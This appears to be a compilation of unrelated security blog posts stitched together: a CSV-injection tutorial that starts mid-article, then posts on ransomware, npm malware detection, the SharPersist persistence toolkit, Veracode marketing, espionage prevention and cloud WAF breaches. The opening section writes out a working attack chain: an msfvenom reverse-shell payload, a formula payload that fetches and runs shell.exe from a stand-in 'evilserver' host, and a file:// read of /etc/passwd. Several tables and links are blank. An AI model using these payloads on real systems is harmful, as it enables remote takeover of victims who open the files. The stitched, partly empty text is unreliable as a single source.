A more advanced attack would use the same method as above but with a different payload, which would lead to remote code execution. This type of attack does depend on a number of factors and might not always be possible. However, it’s still worth considering and also highlights how serious this vulnerability can be under the right circumstances.

Attack in Steps

1. We’ll use a shell.exe file, which can contain whatever we want to execute on the system but, in this scenario, we will use msfvenom to create a reverse Meterpreter payload.

msfvenom -p windows/meterpreter/reverse_tcp  -a x64 --platform Windows LHOST=<IP Address> LPORT=1234 -f exe > shell.exe

2. We also need to set up a listener that will wait for the connect back to us once the shell.exe payload has been executed on the victim’s machine. We will use Metasploit multi/handler for this example. We need to set the LPORT and also make sure the IP address is correct.

3. We also need to host the shell.exe payload so it can be downloaded. For this, I used the following command, python -m SimpleHTTPServer 1337, which will set up a simple web server in the current directory on my system. A real attack might host this on a compromised web server.

4. Once all this has been set up, we could then inject the payload into the application and wait for a victim to download the CSV file and click on the cell with the payload in it.

=cmd|' /C powershell Invoke-WebRequest "http://evilserver:1337/shell.exe"

-OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Breakdown of Payload

  • The first line is calling cmd, which gets passed to the PowerShell Invoke-WebRequest to download a shell.exe file from our evilserver on port 1337. Note that if the host is running PowerShell version 2, the Invoke-WebRequest won’t work.
  • The next line is saving the shell.exe file into the temp directory. The reason we use the temp directory is because it’s a folder anyone can write to.
  • We then start a process to execute the downloaded shell.exe payload.

5. Once the victim opens the file, the CSV injection payload would run. However, it may present a “Remote Data Not Accessible” warning. The chances are that most victims would think the file has come from a legitimate source and so they need to select yes to view the data. It should also be noted that in this scenario the Excel file is empty apart from our payload. In a real-world attack, the Excel file would be populated with information from the application.

6. Once the victim selects yes, within a few moments, Metasploit will get a reverse connect from the victim’s host.

7. At this point, the attacker can perform a number of tasks depending on the level of access he or she has obtained. This includes, but is not limited to, stealing passwords in memory, attacking other systems in the network (if this host is connected to a network), taking over uses’ webcams, etc. In fact, under the right circumstances, it would be possible to compromise an entire domain using this attack.

When testing for CSV injections, in most instances, a tester will use a simple payload. This is due to a number of reasons. It’s not uncommon for a tester to demonstrate this type of attack by using a Hyperlink payload like the one above, or a simple cmd payload like the following =cmd|’/C cmd.exe ’!’A.

Some might also use the following payload depending on the operating system: ='file://etc/passwd'#$passwd.A1

This would read the first line within the etc/passwd file on a Linux system.

Mitigating the Risk

The best way to mitigate against this type of attack is to make sure all users’ inputs are filtered so only expected characters are allowed. Client-supplied inputs should always be considered unsafe and treated with caution when processing. CSV injection is a side effect of bad input validation, and other types of web attacks are due to weak input validation. To mitigate against CSV injections, a default-deny regular expression or “whitelist” regular expression should be used to filter all data that is submitted to the application. Because Excel and CSV files utilize equals signs (=), plus signs (+), minus signs (-), and “At” symbols (@) to denote formulas, we recommend filtering these out to ensure no cells begin with these characters. Any element that could appear in a report could be a target for Excel / CSV injections and should be further validated for CSV injection.

In summary, CSV injection is not a new attack vector, but it’s one that developers often forget about. As more web applications have the ability to extract data, it’s one that could have serious consequences if steps are not taken to mitigate the risk it poses. In addition, developers should be checking user input for other types of attacks like XSS.


Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

Ransomware is commonly deployed across an environment in two ways:

  1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
    • Manually run encryptors on targeted systems.
    • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
    • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
    • Deploy encryptors with existing software deployment tools utilized by the victim organization.
  2. Automated propagation:
    • Credential or Windows token extraction from disk or memory.
    • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
    • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).

The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

  • Endpoint segmentation
  • Hardening against common exploitation methods
  • Reducing the exposure of privileged and service accounts
  • Cleartext password protections

If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

Read the report today.

*Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

Discovering Malicious Packages Published on npm

Sightings of malicious packages on popular open source repositories (such as npm and RubyGems) have become increasingly common: just this year, there have been several reported incidents.

This method of attack is frighteningly effective given the widespread reach of popular packages, so we've started looking into ways to discover malicious packages to hopefully preempt such threats.

The problem

In November 2018, a malicious package named “flatmap-stream” was discovered as a transitive dependency of a popular library, “event-stream,” with 1.4 million weekly downloads. Here, the attacker gained publishing rights through social engineering, targeting a package that was not regularly maintained. The attacker published an updated version, “3.3.6,” adding malicious code to steal cryptocurrency. This went undetected for two to three months.

In a separate incident from June 2019, a malicious package “electron-native-notify” was discovered to be stealing sensitive information, such as cryptocurrency wallet seeds and other credentials. The attacker waited for the package to be consumed by another popular library before introducing malicious code into subsequent releases. This was also undetected for two to three months.

Detection of the problem

Malicious packages tend to exhibit a number of common patterns. To understand the common patterns contained in malicious packages, we looked at a past research paper, “Static Detection of Application Backdoors” (, as well as going through publicly reported incidents to come up with the following list.


Malicious packages tend to hide payloads using encoding methods such as base64 and hex. Such APIs are typically used only by libraries, which implement low-level protocols or provide utility functions, so finding them is a good indicator that a package is malicious.

Reading of sensitive information

Sensitive information is data from the environment, which libraries should only be reading with good reason. This includes files like “/etc/shadow,” “~/.aws/credentials,” or SSH private keys.

Exfiltration of information

Libraries are unlikely to contact hardcoded external servers; this is something more commonly done in downstream applications. Malicious libraries tend to do this to exfiltrate information, so we look for such occurrences.

Remote code execution

A pre-install or post-install script is a convenient way of running arbitrary code on a victim's machine. Payloads may also be downloaded from external sources.


While typo-squatted packages are not always malicious, they are a red flag. We deem typo-squatted packages as malicious, since they may provide the exact same functionality and interface, and may update their payload when the package becomes dependent on other popular packages.

Implementation of a detector for malicious packages

To find malicious packages in the wild, we wrote specific, lightweight static analyses for each pattern and ran them over our dataset of npm packages, looking for packages flagged by one or more detectors. False positives were expected; the plan was to narrow the number of candidates to the point where manual verification was feasible.

Two example analyses:

  • To find hardcoded external URLs, we extracted URL-like string literals from the abstract syntax trees of JavaScript source files.
  • To detect typo-squatting, we looked for package names with a maximum Levenshtein distance of 2 between the names of the top 1000 packages, e.g., “mogobd” vs. “mongodb.”

We ran these only on the latest versions of packages.


The full analysis took less than a day and uncovered 17 new malicious packages:

* axioss

* axios-http

* body-parse-xml

* sparkies

* js-regular

* file-logging

* mysql-koa

* import-mysql

* mogodb

* mogobd

* mogoose

* mogodb-core

* node-ftp

* serializes

* serilize

* koa-body-parse

* node-spdy

We disclosed these malicious packages to the npm security team, and they were yanked from the registry.

Most of the malicious packages above hide their payloads as a “test” and use pre-/post-/test-install scripts to exfiltrate information. For example, “node-ftp” exposes the host information of the victim by sending the values of “os.hostname(),” “os.type(),” “os.uptime(),” and “os.tmpdir()” to its server at “”

Disclosure timeline

The disclosure timeline was as follows:


This activity of finding undetected malicious packages has further confirmed our suspicions of the existence of harmful libraries out in the open, and is only the beginning of our quest to efficiently overturn all stones to reduce potential threats. To do this, we intend to perform more regular, automated, and thorough audits on public packages, then generalize these techniques for other package managers like RubyGems.

SharPersist: Windows Persistence Toolkit in C#


PowerShell has been used by the offensive community for several years now but recent advances in the defensive security industry are causing offensive toolkits to migrate from PowerShell to reflective C# to evade modern security products. Some of these advancements include Script Block Logging, Antimalware Scripting Interface (AMSI), and the development of signatures for malicious PowerShell activity by third-party security vendors. Several public C# toolkits such as Seatbelt, SharpUp and SharpView have been released to assist with tasks in various phases of the attack lifecycle. One phase of the attack lifecycle that has been missing a C# toolkit is persistence. This post will talk about a new Windows Persistence Toolkit created by FireEye Mandiant’s Red Team called SharPersist.

Windows Persistence

During a Red Team engagement, a lot of time and effort is spent gaining initial access to an organization, so it is vital that the access is maintained in a reliable manner. Therefore, persistence is a key component in the attack lifecycle, shown in Figure 1.

Figure 1: FireEye Attack Lifecycle Diagram

Once an attacker establishes persistence on a system, the attacker will have continual access to the system after any power loss, reboots, or network interference. This allows an attacker to lay dormant on a network for extended periods of time, whether it be weeks, months, or even years. There are two key components of establishing persistence: the persistence implant and the persistence trigger, shown in Figure 2. The persistence implant is the malicious payload, such as an executable (EXE), HTML Application (HTA), dynamic link library (DLL), or some other form of code execution. The persistence trigger is what will cause the payload to execute, such as a scheduled task or Windows service. There are several known persistence triggers that can be used on Windows, such as Windows services, scheduled tasks, registry, and startup folder, and there continues to be more discovered. For a more thorough list, see the MITRE ATT&CK persistence page.

Figure 2: Persistence equation

SharPersist Overview

SharPersist was created in order to assist with establishing persistence on Windows operating systems using a multitude of different techniques. It is a command line tool written in C# which can be reflectively loaded with Cobalt Strike’s “execute-assembly” functionality or any other framework that supports the reflective loading of .NET assemblies. SharPersist was designed to be modular to allow new persistence techniques to be added in the future. There are also several items related to tradecraft that have been built-in to the tool and its supported persistence techniques, such as file time stomping and running applications minimized or hidden.

SharPersist and all associated usage documentation can be found at the SharPersist FireEye GitHub page.

SharPersist Persistence Techniques

There are several persistence techniques that are supported in SharPersist at the time of this blog post. A full list of these techniques and their required privileges is shown in Figure 3.



Technique Switch Name (-t)

Admin Privileges Required?

Touches Registry?

Adds/Modifies Files on Disk?


Backdoor KeePass configuration file





New Scheduled Task

Creates new scheduled task





New Windows Service

Creates new Windows service






Registry key/value creation/modification





Scheduled Task Backdoor

Backdoors existing scheduled task with additional action





Startup Folder

Creates LNK file in user startup folder





Tortoise SVN

Creates Tortoise SVN hook script





Figure 3: Table of supported persistence techniques

SharPersist Examples

On the SharPersist GitHub, there is full documentation on usage and examples for each persistence technique. A few of the techniques will be highlighted below.

Registry Persistence

The first technique that will be highlighted is the registry persistence. A full listing of the supported registry keys in SharPersist is shown in Figure 4.

Registry Key Code (-k)

Registry Key

Registry Value

Admin Privileges Required?

Supports Env Optional Add-On (-o env)?



User supplied





User supplied





User supplied




HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon






User supplied





User supplied













Figure 4: Supported registry keys table

In the following example, we will be performing a validation of our arguments and then will add registry persistence. Performing a validation before adding the persistence is a best practice, as it will make sure that you have the correct arguments, and other safety checks before actually adding the respective persistence technique. The example shown in Figure 5 creates a registry value named “Test” with the value “cmd.exe /c calc.exe” in the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key.

Figure 5: Adding registry persistence

Once the persistence needs to be removed, it can be removed using the “-m remove” argument, as shown in Figure 6. We are removing the “Test” registry value that was created previously, and then we are listing all registry values in “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” to validate that it was removed.

Figure 6: Removing registry persistence

Startup Folder Persistence

The second persistence technique that will be highlighted is the startup folder persistence technique. In this example, we are creating an LNK file called “Test.lnk” that will be placed in the current user’s startup folder and will execute “cmd.exe /c calc.exe”, shown in Figure 7.

Figure 7: Performing dry-run and adding startup folder persistence

The startup folder persistence can then be removed, again using the “-m remove” argument, as shown in Figure 8. This will remove the LNK file from the current user’s startup folder.

Figure 8: Removing startup folder persistence

Scheduled Task Backdoor Persistence

The last technique highlighted here is the scheduled task backdoor persistence. Scheduled tasks can be configured to execute multiple actions at a time, and this technique will backdoor an existing scheduled task by adding an additional action. The first thing we need to do is look for a scheduled task to backdoor. In this case, we will be looking for scheduled tasks that run at logon, as shown in Figure 9.

Figure 9: Listing scheduled tasks that run at logon

Once we have a scheduled task that we want to backdoor, we can perform a dry run to ensure the command will successfully work and then actually execute the command as shown in Figure 10.

Figure 10: Performing dry run and adding scheduled task backdoor persistence

As you can see in Figure 11, the scheduled task is now backdoored with our malicious action.

Figure 11: Listing backdoored scheduled task

A backdoored scheduled task action used for persistence can be removed as shown in Figure 12.

Figure 12: Removing backdoored scheduled task action


Using reflective C# to assist in various phases of the attack lifecycle is a necessity in the offensive community and persistence is no exception. Windows provides multiple techniques for persistence and there will continue to be more discovered and used by security professionals and adversaries alike.

This tool is intended to aid security professionals in the persistence phase of the attack lifecycle. By releasing SharPersist, we at FireEye Mandiant hope to bring awareness to the various persistence techniques that are available in Windows and the ability to use these persistence techniques with C# rather than PowerShell.

Tips for Kicking Off Your Veracode Security Program Manager Relationship

If you’re a Veracode customer, there’s a good chance that you’ve heard of – or maybe even work with – a Veracode security program manager (SPM). For those of you who might not know, SPMs help you define the goals of your application security program, onboard your team, answer any questions about Veracode products, and work with your teams to ensure that your program stays on track and continues to mature.

If you’re just kicking off your relationship with your program manager, you might be wondering what to expect on your initial calls, and how you can make the most out of the time you spend interacting with each other. Here are a few things you should keep in mind:

How are you developing software?

To realize the value of your investment, we need to understand how your development process works. Right off the bat, your security program manager will want to talk about your existing tech stack (aka – the technology you’re currently using to make your software). There’s a good chance that your organization could be in a different place at the time of your kickoff call compared to where it was when your sales cycle closed. Yes, your account executive will tell your program manager all that he or she knows about your status at the time of closing, but in case anything does change, it’s better to hear everything straight from the horse’s mouth. Helping us understand the size of your software footprint is also key – are you licensed for 10 apps, but have a total of 300, or 3,000? How are they governed from a development and security standpoint? Having everyone on the same page on these basics is a good first step towards maturing your AppSec program.

Who are the key players?

You should also have a clear idea of what your organizational layout is, as well as who the key players are on the development and security sides. Your SPM will know who your key players are, but they likely won’t have met them and interacted with them as much as the account executive has. In addition, if your sales cycle has been particularly long, it’s possible the key players have changed. Be prepared to fill your security program manager in on everyone who has a stake in your AppSec program on the development AND security sides of your organization. Additionally, if there’s any turnover within your company down the line, knowing everyone who’s involved will ensure that SPMs have multiple stakeholders with program context who they can go to in order to keep momentum.

SPMs will also want to know the informal structure of your organization, or the “politics.” It can be helpful to know if your development and security teams are on the same page when it comes to the priority level of AppSec, or if they get along at all! The more insight your SPM has into your organization, the better prepared you can be – as a team – to work together moving forward.

Align your goals and expectations appropriately

Often, the goals that customers set up with Veracode and the goals within their own organizations tend to be two different things. Establish a list of realistic goals, and be prepared to take incremental steps to get there. Rome wasn’t built in a day, and neither is a fully mature application security program.

Once you have your manageable goals, establish who is responsible for each one, and how they’re going to be held accountable for meeting each goal. You’ll need to establish clear channels of communication and accountability internally – for example, when you’re coming up with a plan to remediate flaws, engage development and product management as soon as you have flaw scopes. Make sure that the amount of remediation you’re targeting is realistic for the desired deadline, and let development know about the remediation resources available in the Veracode platform and in the Services organization in case they get stuck. Your SPM can absolutely help you have that conversation!

When it comes to expectations, have an understanding of the driver behind why Veracode was purchased. In some cases, your buyer might not communicate the driving factor to the person running the program – maybe you! Regardless of which end you’re on, make sure that your internal plan is well-communicated with everyone who’s involved across the organization.

At the end of the day, we want you to be successful in your application security journey. By keeping these tips in mind, you’re already one step closer to success. You can find out more by talking to other Veracode customers about how they’ve found success with their application security programs in the Veracode Community.

Veracode Customers Improve Mean Time to Remediation by 90%

Bill Gates is well known for treating time as a scarce resource, and in 1994, John Seabrook published a piece in The New Yorker detailing an email exchange he carried on with the famous technologist. Seabrook notes that Gates’ reverence for time was evident in his correspondence – skipping salutations and pleasantries, leaving spelling mistakes and grammatical errors in-line, and never addressing the journalist by his name. In one of the emails, Gates wrote that, “the digital revolution is all about facilitation – creating tools to make things easy.”

Software is the heart of the global economy, and it has paved the way for increased productivity, simplified workflows, and has helped leaders build businesses beyond their wildest dreams. It has changed the way that security practitioners and developer teams view and manage time, through agile methodology and sprint planning facilitated by tools like JIRA.

Just as minutes, hours, and days can be the difference between meeting sprint deadlines and maintaining speed to market, time is also the difference between preventing a massive data breach and being the victim of one. However, although a cutting-corners approach may work well for email correspondence between colleagues, and perhaps journalists, using this timesaving approach when crafting code has the potential to be downright dangerous. Organizations today need to balance time to market and code quality, which includes code security.

How organizations reduced mean time to remediation and saw a 63% ROI with Veracode

We recently commissioned the Forrester Total Economic ImpactTM of Veracode Application Security Platform to learn how our customers’ security and developer teams are strengthening the security posture of their applications by reducing mean time to remediation (MTTR) by implementing DevSecOps practices using our solutions. Based on interviews with Veracode customers in insurance, healthcare, finance, and information technology services, Forrester created a TEI framework, composite company, and an associated ROI analysis to illustrate financial impact.

The report found that prior to using Veracode, the composite organization experienced 60 flaws per MB of code, though they were using other application security testing solutions. After adopting the Veracode Platform and integrating tools into their CI/CD pipeline, the composite saw a reduction in security flaws of 50 percent to 90 percent over three years.

Additionally, by implementing DevSecOps practices, building stringent security controls, and integrating vulnerability testing into their CI/CD pipeline, our customers were able to reduce mean time to remediation by 90 percent. Resolutions that previously took 2.5 hours on average were reduced to 15 minutes, helping developers reduce their time spent remediating flaws by 47 percent. This stands to reason, given that our State of Software Security Volume 9 (SOSS Vol. 9) found that the most active DevSecOps teams fix flaws 11.5x faster than the typical organization.

By using Veracode Greenlight and Veracode Software Composition Analysis, developer teams were able to identify issues while they were coding, which reduced the likelihood that flaws would enter later stages of production. What’s more, our customers’ developer teams introduced fewer flaws to their code, and those flaws took less time to resolve because we offered them contextual information related to the data path and call stack information of their code.

It’s not enough to find security flaws quickly if you’re not remediating the right ones quickly

Most companies prioritize high-severity and critical vulnerabilities because they are less complicated to attack, offer greater opportunity for complete application compromise, and are more likely to be remotely exploitable. The trouble is that if a low-severity vulnerability is present in the execution path, it may put your application at greater risk than a high-severity vulnerability if your application is never calling upon that severe vulnerability in the first place. The exploitability of a vulnerability is a critical consideration many organizations overlook.

In our analysis of flaw persistence in SOSS Vol. 9, we found that organizations hit the three quarters-closed mark about 57 percent sooner for high and very high severity vulnerabilities than for their less severe counterparts. In fact, our scan data indicates that low-severity flaws were attended to at a significantly slower rate than the average speed of closure. It took organizations an average of 604 days to close three quarters of these weaknesses.

With many tools out there, developers will receive an extremely large list of vulnerabilities, including those open source libraries packaged in your application, and they will have to make a judgment call on what to fix first – and how much is worth fixing before pushing to production. The stark reality is that the time it takes developers to fix security flaws has a much larger impact on reducing risk than any other factor.

Veracode offers developers the opportunity to write secure code, limit the vulnerabilities introduced into production, and prioritize vulnerabilities with our vulnerable method approach, expert remediation coaching, and security program managers. To learn more about how the Veracode Platform enables security and development teams to work in stronger alignment, reduce mean time to remediation, and boost an organization’s bottom line, download the Forrester Total Economic ImpactTM of Veracode Application Security Platform.

Protecting Your Engineering Business from Industrial Espionage and Cybercriminals

Industrial espionage is a much more common occurrence than many people realize. As a business grows and begins to compete at a higher level, the stakes grow and their corporate secrets become more valuable. It isn’t just other businesses that might want this information, hackers who think they can sell the information will also be sniffing about.

Even if you can’t eliminate the risk entirely, there are certain things you can do to reduce the risk of a security breach in your business.

Shred Documents

While hackers do much of their work from their computers, they also often rely on a number of offline methods to enhance their effectiveness. For example, social engineering is regularly used to coerce people into unwittingly undermining otherwise very secure systems. Countering social engineering is difficult, although educating your employees about it will go a long way to mitigating the risk.

If a hacker wants to access your systems but is struggling to breach your cybersecurity, they may well turn to other methods to get through your security, including rummaging through bins for any discarded documents. If that sounds desperate to you, you might not realize just how often it works.

Make sure that any documentation that contains information that would be of interest to a would-be hacker, or corporate competitor, is completely destroyed when it is no longer needed. Make sure that if you use a shredder to do this, it is one that shreds documents securely.

Don’t Print Sensitive Information if You Don’t Have to

Of course, what would be better than having to securely destroy documents would be to not generate those documents to begin with. If you don’t have to print out sensitive information – don’t! If your sensitive documents are protected by a decent cybersecurity system, they will be about as safe as they can be. A physical document is much less secure.

Keep Your Schematics Under Wraps

Anyone who has access to the design schematics of your most important products will be able to reverse engineer them and probe them for weaknesses, even if they don’t have access to a physical device. Modern engineering businesses, like businesses in a number of other industries, make extensive use of printed circuit boards. If a competitor gets their hands on your PCB schematics, they can easily copy your proprietary technology.

Designing your own PCBs using or a similar software package means that you can produce hardware that is unique to your engineering business. This should give you an added layer of security, as a potential hacker or criminal won’t know the internal layout and therefore won’t know what the potential entry points are. However, if they get their hands on your schematics, you instantly lose this benefit.

Keep it Need to Know

Your most sensitive corporate secrets shouldn’t be given to anyone who doesn’t need them. In any business, there will be coworkers who also become friends. Even if people only see each other when they’re at work, they will often develop friendly relationships with one another. It is important to maintain a distinction between business and pleasure – don’t feel bad about withholding sensitive information from someone that you trust if there is no reason for them to have that information.

If you want to keep your engineering business secure, you need to make sure that workers at all levels understand their individual role in ensuring the security of the business as a whole. All it takes is one clueless person to undermine even the most secure cybersecurity system.

The post Protecting Your Engineering Business from Industrial Espionage and Cybercriminals appeared first on CyberDB.

My Cloud WAF Service Provider Suffered a Data Breach…How Can I Protect Myself?

In the age of information, data is everything. Since the implementation of GDPR in the EU, businesses around the world have grown more “data conscious;” in turn, people, too, know that their data is valuable.

It’s also common knowledge at this point that data breaches are costly. For example, Equifax, the company behind the largest-ever data breach, is expected to pay at least $650 million in settlement fees.

And that’s just the anticipated legal costs associated with the hacking. The company is spending hundreds of millions of dollars in upgrading its systems to avert any future incidents. 

In the cloud WAF arena, data breaches are no strangers. Having powerful threat detection capabilities behind your cloud WAF service provider, while important, is not the only thing to rely on for data breach prevention. 

API security and secure SSL certificate management are just as important. 

So, what are some ways hackers can cause damage as it relates to cloud WAF customers? And how can you protect yourself if you are using a cloud WAF service?

The topics covered in this blog will answer the following:

  • What can hackers do with stolen emails?
  • What can hackers do with salted passwords?
  • What can hackers do with API keys?
  • What can hackers do with compromised SSL certificates?
  • What can I do to protect myself if I am using a cloud WAF?

► What can hackers do with stolen emails?

When you sign up for a cloud WAF service, your email is automatically stored in the WAF vendor’s database so long as you use their service. 

In case of a data breach, if emails alone are compromised, then phishing emails and spam are probably your main concern. Phishing emails are so common we often sometimes we forget how dangerous they are. 

For example, if a hacker has access to your email, they have many ways they can impersonate a legal entity (e.g. by purchasing a similar company domain) and send unsolicited emails to your inbox.


► What can hackers do with salted passwords?

Cloud WAF vendors that store passwords in their database without any hashing or salting are putting their customers at risk if there is a breach, and even more so if hackers already have email addresses. 

In this scenario, hackers can quickly take over your account or sell your login credentials online. But what if the WAF vendors salted the passwords? Hashing passwords can certainly protect against some hacker intrusions.

In the event of a password breach without salting/hashing, a hacker can get your website to validate your password when the website compares and matches the stored hash to the hash in the database.

This is where salting the hash can help defeat this particular attack, but it won’t guarantee protection against hash collision attacks (a type of attack on a cryptographic hash that tries to find two inputs that produce the same hash value).

In this scenario, systems with weak hashing algorithms can allow hackers access to your account even if the actual password is wrong because whether they insert different inputs (actual password and some other string of characters for example), the output is the same.

► What can hackers do with API keys?

Cloud WAF vendors that use or provide APIs to allow third-party access must place extra attention to API security to protect their customers. 

APIs are connected to the internet and transfer data and allows many cloud WAFs work to implement load balancers among other things via APIs. 

If API keys are not using HTTPS or API requests not being authenticated, then there is a risk for hackers to take over the accounts of developers. 

If a cloud WAF vendor is using a public API but did not register for an authorized account to gain access to the API, hackers can exploit this situation to send repeated API requests. Had the APIs been registered, then the API key can be tracked if it’s being used for too many suspicious requests. 

Beyond securing API keys, developers must also secure their cloud credentials. If a hacker gains access to this then they are able to possibly take down servers, completely mess up DNS information, and more. 

API security is not only a concern for developers but also for end users using APIs for their cloud WAF service as you’ll see in the next section. 

► What can hackers do with compromised SSL certificates?

Next, what happens if the SSL certificates WAF customers provided ends up in the hands of hackers? 

Let’s assume the hacker has both the API keys and SSL certificates. In this scenario, hackers can affect the security of the incoming and outgoing traffic for customer websites.

With the API keys, hackers can whitelist their own websites from the cloud WAF’s settings, allowing their websites to bypass detection. This allows them to attack sites freely.

Additionally, hackers could modify the traffic of a customer website to divert traffic to their own sites for malicious purposes. Because the hackers also have the SSL certificates then they can expose this traffic as well and put you at risk for exploits and other vulnerabilities.


► What can I do to protect myself if I am using a cloud WAF?

First, understand that your data is never 100% safe. If a company claims that your data is 100% safe, then you should be wary. No company can guarantee that your data will always be safe with them. 

When there is a data breach, however, cloud WAF customers are strongly encouraged to change their passwords, enable 2FA, upload new SSL certificates, and reset their API keys. 

Only two of these are realistic preventive measures (changing your passwords frequently and using 2FA), but it’s unlikely that you, as a customer, will frequently upload new SSL certificates and change your API keys. 

Thus, we recommend that you ask your WAF vendors about the security of not just the WAF technology itself but also how they deal with API security and how they store SSL certificates for their customers.

If you’d like to chat with one of our security experts and see how our cloud WAF works, submit the form below!


The post My Cloud WAF Service Provider Suffered a Data Breach…How Can I Protect Myself? appeared first on Cloudbric.